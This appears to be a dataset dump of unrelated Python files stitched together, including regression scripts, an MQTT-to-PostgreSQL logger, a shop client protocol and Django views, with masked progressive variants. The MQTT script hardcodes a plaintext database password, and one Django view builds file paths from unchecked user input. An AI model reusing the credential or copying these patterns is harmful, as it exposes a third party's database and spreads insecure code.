total_test_variance += test_variance * count\n \n #~~~~calculate against baseline~~~~~~~~~~~\n \n # Xy = np.array(allDumbData) -----------------------------------\n # np.random.shuffle(Xy) ----------------------------------------\n # X = Xy[ :, range(0, Xy.shape[1]-1) ] -------------------------\n # y = Xy[ :, Xy.shape[1]-1 ] -----------------------------------\n# -----------------------------------------------------------------------------\n # X_normalized = (X) -------------------------------------------\n# -----------------------------------------------------------------------------\n # # Separate into Train and Test datasets ----------------------\n # train_test_split = int(round(len(y) * 0.7)) ------------------\n # X_normalized_train = X_normalized[:train_test_split] ---------\n # X_normalized_test = X_normalized[train_test_split:] ----------\n # y_train = y[:train_test_split] -------------------------------\n # y_test = y[train_test_split:] --------------------------------\n# -----------------------------------------------------------------------------\n # regr = linear_model.LinearRegression(fit_intercept=True) -----\n # regr.fit(X_normalized_train, y_train) ------------------------\n# -----------------------------------------------------------------------------\n # # Error Analysis ---------------------------------------------\n # train_error = np.mean((regr.predict(X_normalized_train) - y_train) ** 2) \n # train_variance = regr.score(X_normalized_train, y_train) -----\n # test_error = np.mean((regr.predict(X_normalized_test) - y_test) ** 2) \n # test_variance = regr.score(X_normalized_test, y_test) --------\n # # print(\"Residual sum of squares for training set: %.2f\" % train_error) ---- \n # # print('Variance score: %.2f' % train_variance) --------------------------- \n # # print(\"Residual sum of squares for dumb test set: %.2f\" % test_error) \n # # print('Variance score for dumb test set: %.2f' % test_variance) -- \n # dumb_total_train_error += train_error * count ----------------\n # dumb_total_train_variance += train_variance * count ----------\n # dumb_total_test_error += test_error * count ------------------\n # dumb_total_test_variance += test_variance * count ------------\n \n total_train_error = total_train_error / total_count\n total_train_variance = total_train_variance / total_count\n total_test_error = total_test_error / total_count\n total_test_variance = total_test_variance / total_count\n # dumb_total_train_error = dumb_total_train_error / total_count ------------\n # dumb_total_train_variance = dumb_total_train_variance / total_count ------\n # dumb_total_test_error = dumb_total_test_error / total_count --------------\n # dumb_total_test_variance = dumb_total_test_variance / total_count --------\n print(\"alpha-value: %.2f\" % k)\n print(\"total_train_error: %.2f\" % total_train_error)\n print(\"total_train_variance: %.2f\" % total_train_variance)\n print(\"total_test_error: %.2f\" % total_test_error)\n print(\"total_test_variance: %.2f\" % total_test_variance)\n # print(\"dumb_total_train_error: %.2f\" % dumb_total_train_error) -----------\n # print(\"dumb_total_train_variance: %.2f\" % dumb_total_train_variance) -----\n # print(\"dumb_total_test_error: %.2f\" % dumb_total_test_error) -------------\n # print(\"dumb_total_test_variance: %.2f\" % dumb_total_test_variance) -------\n # print(\"total_count: %d\" % (total_count / ITERATIONS)) --------------------\n \n if (total_test_error < best_error):\n best_error = total_test_error\n best_k = k\n \n# Calculate against baseline ---------------------------------------------------\ncursor = db.playtime_model.find({\"AVG_MIN\": {\"$gt\": MINUTE_RESTRICTION}})\nbaseline_error = 0.0\ncount = 0\nfor document in cursor:\n baseline_error += (document['AVG_MIN'] - document['MIN'])**2\n count += 1\nbaseline_error = baseline_error / count\nprint(\"baseline error: %.2f\" % baseline_error)\nprint(\"best error: %.2f, best alpha: %.2f\" % (best_error, best_k))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import ssl
import sys
import psycopg2 #conectarte python con postresql
import paho.mqtt.client #pip install paho-mqtt
import json
conn = psycopg2.connect(host = 'raja.db.elephantsql.com', user= 'oyoqynnr', password ='myHVlpJkEO21o29GKYSvMCGI3g4y05bh', dbname= 'oyoqynnr')
def on_connect(client, userdata, flags, rc):
print('Conectado (%s)' % client._client_id)
client.subscribe(topic='unimet/#', qos = 0)
def ventasTIENDA(client, userdata, message):
a = json.loads(message.payload)
print(a)
cur = conn.cursor()
sql = '''INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'''
cur.execute(sql, (a["DATE"],a["ID_TIENDA"],a["MAC_ADD"],a["MONTO"]))
conn.commit()
print('VENTA EFECTUADA')
print('------------------------------')
def main():
client = paho.mqtt.client.Client()
client.on_connect = on_connect
client.message_callback_add('unimet/ventas', ventasTIENDA)
client.connect("broker.hivemq.com",1883,60)
client.loop_forever()
if __name__ == '__main__':
main()
sys.exit(0)
|
normal
|
{
"blob_id": "f1b36e3ce3189c8dca2e41664ac1a6d632d23f79",
"index": 5078,
"step-1": "<mask token>\n\n\ndef on_connect(client, userdata, flags, rc):\n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos=0)\n\n\ndef ventasTIENDA(client, userdata, message):\n a = json.loads(message.payload)\n print(a)\n cur = conn.cursor()\n sql = (\n 'INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'\n )\n cur.execute(sql, (a['DATE'], a['ID_TIENDA'], a['MAC_ADD'], a['MONTO']))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------')\n\n\ndef main():\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect('broker.hivemq.com', 1883, 60)\n client.loop_forever()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef on_connect(client, userdata, flags, rc):\n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos=0)\n\n\ndef ventasTIENDA(client, userdata, message):\n a = json.loads(message.payload)\n print(a)\n cur = conn.cursor()\n sql = (\n 'INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'\n )\n cur.execute(sql, (a['DATE'], a['ID_TIENDA'], a['MAC_ADD'], a['MONTO']))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------')\n\n\ndef main():\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect('broker.hivemq.com', 1883, 60)\n client.loop_forever()\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n",
"step-3": "<mask token>\nconn = psycopg2.connect(host='raja.db.elephantsql.com', user='oyoqynnr',\n password='myHVlpJkEO21o29GKYSvMCGI3g4y05bh', dbname='oyoqynnr')\n\n\ndef on_connect(client, userdata, flags, rc):\n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos=0)\n\n\ndef ventasTIENDA(client, userdata, message):\n a = json.loads(message.payload)\n print(a)\n cur = conn.cursor()\n sql = (\n 'INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'\n )\n cur.execute(sql, (a['DATE'], a['ID_TIENDA'], a['MAC_ADD'], a['MONTO']))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------')\n\n\ndef main():\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect('broker.hivemq.com', 1883, 60)\n client.loop_forever()\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n",
"step-4": "import ssl\nimport sys\nimport psycopg2\nimport paho.mqtt.client\nimport json\nconn = psycopg2.connect(host='raja.db.elephantsql.com', user='oyoqynnr',\n password='myHVlpJkEO21o29GKYSvMCGI3g4y05bh', dbname='oyoqynnr')\n\n\ndef on_connect(client, userdata, flags, rc):\n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos=0)\n\n\ndef ventasTIENDA(client, userdata, message):\n a = json.loads(message.payload)\n print(a)\n cur = conn.cursor()\n sql = (\n 'INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'\n )\n cur.execute(sql, (a['DATE'], a['ID_TIENDA'], a['MAC_ADD'], a['MONTO']))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------')\n\n\ndef main():\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect('broker.hivemq.com', 1883, 60)\n client.loop_forever()\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n",
"step-5": "import ssl\nimport sys\nimport psycopg2 #conectarte python con postresql\nimport paho.mqtt.client #pip install paho-mqtt\nimport json\n\nconn = psycopg2.connect(host = 'raja.db.elephantsql.com', user= 'oyoqynnr', password ='myHVlpJkEO21o29GKYSvMCGI3g4y05bh', dbname= 'oyoqynnr')\n\n \ndef on_connect(client, userdata, flags, rc): \n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos = 0) \n\n\ndef ventasTIENDA(client, userdata, message): \n a = json.loads(message.payload) \n print(a) \n cur = conn.cursor()\n sql = '''INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'''\n cur.execute(sql, (a[\"DATE\"],a[\"ID_TIENDA\"],a[\"MAC_ADD\"],a[\"MONTO\"]))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------') \n\n\n\n\ndef main():\t\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect(\"broker.hivemq.com\",1883,60)\n client.loop_forever()\n\nif __name__ == '__main__':\n\tmain()\n\tsys.exit(0)\n\n\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney
from netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport
from netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient
import asyncio
import playground
import random, logging
from playground import getConnector
from playground.network.packet import PacketType
from playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER
from playground.network.packet.fieldtypes.attributes import Optional
from playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport
import zlib
import sys
class ShopClientProtocol(asyncio.Protocol):
clientstate = 0
def __init__(self, loop):
#self.loop = loop
self.transport = None
self.loop = loop
self.deserializer = PacketType.Deserializer()
def connection_made(self, transport):
print("ShopClient connection_made is called\n")
self.transport = transport
# PACKET 1 - Request to Buy packet
startbuy = RequestToBuy()
print("Sending Request to Buy")
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print("ShopClient Data_received is called")
self.deserializer.update(data)
#print(data)
for pkt in self.deserializer.nextPackets():
#print("Client <------------{}------------- Server".format(pkt.DEFINITION_IDENTIFIER))
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
# PACKET 3 - Send Item packet
item = "Butter"
response = SendItem()
response.Item = item
print("Sent SendItem")
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
# PACKET 5 - Send Money packet
response = SendMoney()
response.Cash = pkt.Amount
print("Sent SendMoney")
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print("Client Received Incorrect Packet. Closing Connection. Try Again!")
self.transport.close()
def connection_lost(self,exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate():
#1
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
#logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*
#logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr
f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))
ptConnector = playground.Connector(protocolStack=f)
playground.setConnector("passthrough", ptConnector)
go = initiate(loop)
coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)
client = loop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
loop.close()
|
normal
|
{
"blob_id": "a12f9435eb4b090bc73be14ad64fdf43c5caa4d2",
"index": 7471,
"step-1": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n <mask token>\n <mask token>\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n f = StackingProtocolFactory(lambda : PLSClient(), lambda : PEEPClient(loop)\n )\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector('passthrough', ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(\n go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n loop.close()\n",
"step-5": "from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney\nfrom netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport\nfrom netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient\nimport asyncio\nimport playground\nimport random, logging\nfrom playground import getConnector\nfrom playground.network.packet import PacketType\nfrom playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER\nfrom playground.network.packet.fieldtypes.attributes import Optional\nfrom playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport\nimport zlib\nimport sys\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n\n clientstate = 0\n\n def __init__(self, loop):\n #self.loop = loop\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print(\"ShopClient connection_made is called\\n\")\n self.transport = transport\n # PACKET 1 - Request to Buy packet\n startbuy = RequestToBuy()\n print(\"Sending Request to Buy\")\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print(\"ShopClient Data_received is called\")\n self.deserializer.update(data)\n #print(data)\n for pkt in self.deserializer.nextPackets():\n #print(\"Client <------------{}------------- Server\".format(pkt.DEFINITION_IDENTIFIER))\n\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n\n # PACKET 3 - Send Item packet\n item = \"Butter\"\n response = SendItem()\n response.Item = item\n\n print(\"Sent SendItem\")\n self.transport.write(response.__serialize__())\n\n\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n\n # PACKET 5 - Send Money packet\n response = SendMoney()\n\n response.Cash = pkt.Amount\n\n print(\"Sent SendMoney\")\n self.transport.write(response.__serialize__())\n\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n\n self.transport.close()\n\n else:\n print(pkt.Type)\n print(\"Client Received Incorrect Packet. Closing Connection. Try Again!\")\n self.transport.close()\n\n\n def connection_lost(self,exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate():\n #1\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\nif __name__ == \"__main__\":\n\n loop = asyncio.get_event_loop()\n\n #logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*\n #logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr\n\n f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector(\"passthrough\", ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n # Serve requests until Ctrl+C is pressed\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n\n # Close the server\n loop.close()\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
from django.shortcuts import render
import codecs
import os.path
from django.conf import settings
OFFSET = 20
def show_raw_data(req):
filename = req.GET['file']
lineno = int(req.GET['line'])
from_lineno = max(0, lineno - OFFSET)
to_lineno = (lineno + OFFSET)
ctx = dict()
cur_lineno = 1
lines = []
file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' % filename)
with codecs.open(file_path, encoding="windows-1255") as fh:
for line in fh:
if cur_lineno >= from_lineno and cur_lineno <= to_lineno:
lines.append({'lineno': cur_lineno,
'line': line.strip().encode('utf-8', errors='ignore')})
cur_lineno += 1
ctx['lines'] = lines
ctx['filename'] = filename
ctx['lineno'] = lineno
ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET * 2 - 1)
ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET * 2 + 1)
return render(req, 'data/raw_data.html', ctx)
def show_results_from_to(req):
return render(req, 'data/show_results.html', {'title': 'From To',
'app' : 'FromTo'})
def show_trip(req):
return render(req,'data/show_results.html',{'title' : 'Show Trip',
'app' : 'ShowTrip'})
def show_routes(req):
return render(req,'data/show_results.html',{'title': 'Show Routes',
'app': 'ShowRoutes'})
def route_explorer(req):
return render(req, 'ui/RouteExplorer.html')
|
normal
|
{
"blob_id": "576c28bb32b5e0b2b5a82a33cee73e3080dcf3ab",
"index": 1737,
"step-1": "<mask token>\n\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = lineno + OFFSET\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' %\n filename)\n with codecs.open(file_path, encoding='windows-1255') as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno, 'line': line.strip().\n encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET *\n 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET *\n 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To', 'app':\n 'FromTo'})\n\n\n<mask token>\n\n\ndef show_routes(req):\n return render(req, 'data/show_results.html', {'title': 'Show Routes',\n 'app': 'ShowRoutes'})\n\n\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-2": "<mask token>\n\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = lineno + OFFSET\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' %\n filename)\n with codecs.open(file_path, encoding='windows-1255') as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno, 'line': line.strip().\n encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET *\n 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET *\n 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To', 'app':\n 'FromTo'})\n\n\ndef show_trip(req):\n return render(req, 'data/show_results.html', {'title': 'Show Trip',\n 'app': 'ShowTrip'})\n\n\ndef show_routes(req):\n return render(req, 'data/show_results.html', {'title': 'Show Routes',\n 'app': 'ShowRoutes'})\n\n\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-3": "<mask token>\nOFFSET = 20\n\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = lineno + OFFSET\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' %\n filename)\n with codecs.open(file_path, encoding='windows-1255') as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno, 'line': line.strip().\n encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET *\n 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET *\n 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To', 'app':\n 'FromTo'})\n\n\ndef show_trip(req):\n return render(req, 'data/show_results.html', {'title': 'Show Trip',\n 'app': 'ShowTrip'})\n\n\ndef show_routes(req):\n return render(req, 'data/show_results.html', {'title': 'Show Routes',\n 'app': 'ShowRoutes'})\n\n\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-4": "from django.shortcuts import render\nimport codecs\nimport os.path\nfrom django.conf import settings\nOFFSET = 20\n\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = lineno + OFFSET\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' %\n filename)\n with codecs.open(file_path, encoding='windows-1255') as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno, 'line': line.strip().\n encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET *\n 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET *\n 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To', 'app':\n 'FromTo'})\n\n\ndef show_trip(req):\n return render(req, 'data/show_results.html', {'title': 'Show Trip',\n 'app': 'ShowTrip'})\n\n\ndef show_routes(req):\n return render(req, 'data/show_results.html', {'title': 'Show Routes',\n 'app': 'ShowRoutes'})\n\n\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-5": "from django.shortcuts import render\nimport codecs\nimport os.path\nfrom django.conf import settings\n\nOFFSET = 20\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = (lineno + OFFSET)\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' % filename)\n with codecs.open(file_path, encoding=\"windows-1255\") as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno,\n 'line': line.strip().encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET * 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET * 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To',\n 'app' : 'FromTo'})\n\ndef show_trip(req):\n return render(req,'data/show_results.html',{'title' : 'Show Trip',\n 'app' : 'ShowTrip'})\n\ndef show_routes(req):\n return render(req,'data/show_results.html',{'title': 'Show Routes',\n 'app': 'ShowRoutes'})\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django.db import transaction
from django.forms import inlineformset_factory
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import CreateView, UpdateView
from forms.models.fund_operation import FundOperation
from forms.forms.fund_operation_forms import FundOperationForm, FundOperationLineForm, FundOperationFormSet
class FundOperationCreateView(CreateView):
model = FundOperation
template_name = "forms/fund_operation/create.html"
form_class = FundOperationForm
success_url = None
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
if self.request.POST:
data['lines'] = FundOperationFormSet(self.request.POST)
else:
data['lines'] = FundOperationFormSet()
return data
def form_valid(self, form):
context = self.get_context_data()
lines = context['lines']
with transaction.atomic():
form.instance.create_user = self.request.user
self.object = form.save()
if lines.is_valid():
lines.instance = self.object
lines.save()
return super().form_valid(form)
def get_success_url(self):
return reverse_lazy('fund_operation:fund_operation_create')
class FundOperationUpdateView(UpdateView):
model =FundOperation
template_name = "forms/fund_operation/update.html"
form_class = FundOperationForm
success_url = None
def _get_initial_data(self):
if self.object.lines.all():
return None
initial = [
{
'body': 'प्रदेश सरकार',
},
{
'body': 'संघीय सरकार',
},
{
'body': 'स्थानीय तह',
},
{
'body': 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी',
},
{
'body': 'अन्तरराष्ट्रिय गैर सरकारी संस्था',
},
{
'body': 'गैरसरकारी संस्था',
},
]
return initial
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
initial = self._get_initial_data()
if self.request.POST:
data['lines'] = FundOperationFormSet(
self.request.POST,
instance=self.object,
